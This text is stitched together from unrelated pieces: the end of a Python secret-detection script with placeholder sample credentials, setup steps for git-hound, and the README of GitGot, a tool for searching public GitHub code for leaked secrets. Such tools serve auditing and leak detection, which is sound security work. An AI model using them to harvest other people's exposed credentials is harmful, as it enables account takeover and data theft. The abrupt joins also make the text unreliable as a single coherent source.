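def scan(text, min_score=2):
    """Scan multi-line text; report findings with score >= min_score and 1-based line numbers."""
    results = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for f in score_line(line):
            if f["score"] >= min_score:
                results.append(dict(f, line=lineno))
    return results


# Constructed sample input: one real-looking key, one placeholder, one bare
# bearer token, one long but benign identifier, one plain sentence.
SAMPLE_TEXT = """\
api_key = "0123456789abcdef0123456789abcdef"
password = "changeme_please_now"
Authorization: Bearer abcdefghijklmnopqrstuvwxyz012345
THIS_IS_A_LONG_CONFIGURATION_NAME = 1
set timeout to thirty seconds
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_TEXT):
        print(f"line {f['line']}: score={f['score']} entropy={f['entropy']} value={f['value']}")
```

The long benign identifier on line 4 shows why entropy alone is a weak signal: it can clear the threshold, but without the assignment context it never reaches the reporting score.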

Setup
  1. Clone this repo
  2. Use a Python 3 environment (recommended: virtualenv or Conda)
  3. pip install -r requirements.txt (or pip3)
  4. Set up a config.yml file with GitHub credentials. See config.example.yml for an example. Accounts with 2FA are not currently supported.
  5. echo "tillsongalloway.com" | python git-hound.py


GitGot - Semi-automated, Feedback-Driven Tool To Rapidly Search Through Troves Of Public Data On GitHub For Sensitive Secrets


GitGot is a semi-automated, feedback-driven tool to empower users to rapidly search through troves of public data on GitHub for sensitive secrets.


How it Works
During search sessions, users will provide feedback to GitGot about search results to ignore, and GitGot prunes the set of results. Users can blacklist files by filename, repository name, username, or a fuzzy match of the file contents.
Blacklists generated from previous sessions can be saved and reused against similar queries (e.g., example.com vs. subdomain.example.com vs. Example Org). Sessions can also be paused and resumed at any time.
Read more about the semi-automated, human-in-the-loop design here: https://know.bishopfox.com/blog/going-semi-automated-in-an-automated-world-using-human-in-the-loop-workflows-to-improve-our-security-tools

Install Instructions
[1] Install the ssdeep dependency for fuzzy hashing.
Ubuntu/Debian (or equivalent for your distro):
apt-get install libfuzzy-dev ssdeep
or, for Mac OSX:
brew install ssdeep
For Windows or *nix distributions without the ssdeep package, please see the ssdeep installation instructions.
[2] After installing ssdeep, install the Python dependencies using pip:
pip3 install -r requirements.txt

Usage
GitHub requires a token for rate-limiting purposes. Create a GitHub API token with no permissions/no scope. This will be equivalent to public GitHub access, but it will allow access to use the GitHub Search API. Set this token at the top of gitgot.py as shown below:
ACCESS_TOKEN = "<NO-PERMISSION-GITHUB-TOKEN-HERE>"
After adding the token, you are ready to go:
# Query for the string "example.com" using the default RegEx list and logfile location (/logs/<query>.log)
./gitgot.py -q example.com

# Using GitHub advanced search syntax
./gitgot.py -q "org:github cats"

# Custom RegEx List and custom log files location
./gitgot.py -q example.com -f checks/default.list -o example1.log

# Recovery from existing session
./gitgot.py -q example.com -r example.com.state

# Using an existing session (w/blacklists) for a new query
./gitgot.py -q "Example Org" -r example.com.state

Query Syntax
GitGot queries are fed directly into the GitHub code search API, so check out GitHub's documentation for more advanced query syntax.

UI Commands
  • Ignore similar [c]ontent: Blacklists a fuzzy hash of the file contents to ignore future results that are similar to the selected file
  • Ignore [r]epo/[u]ser/[f]ilename: Ignores future results by blacklisting selected strings
  • Search [/(mykeyword)]: Provides a custom regex expression with a capture group to search on the fly (e.g., /(secretToken))
  • [a]dd to Log: Add RegEx matches to log file, including all on-the-fly search results from search command
  • Next[<Enter>], [b]ack: Advances through search results, or returns to previous results
  • [s]ave state: Saves the blacklists and progress in the search results from the session
  • [q]uit: Quit

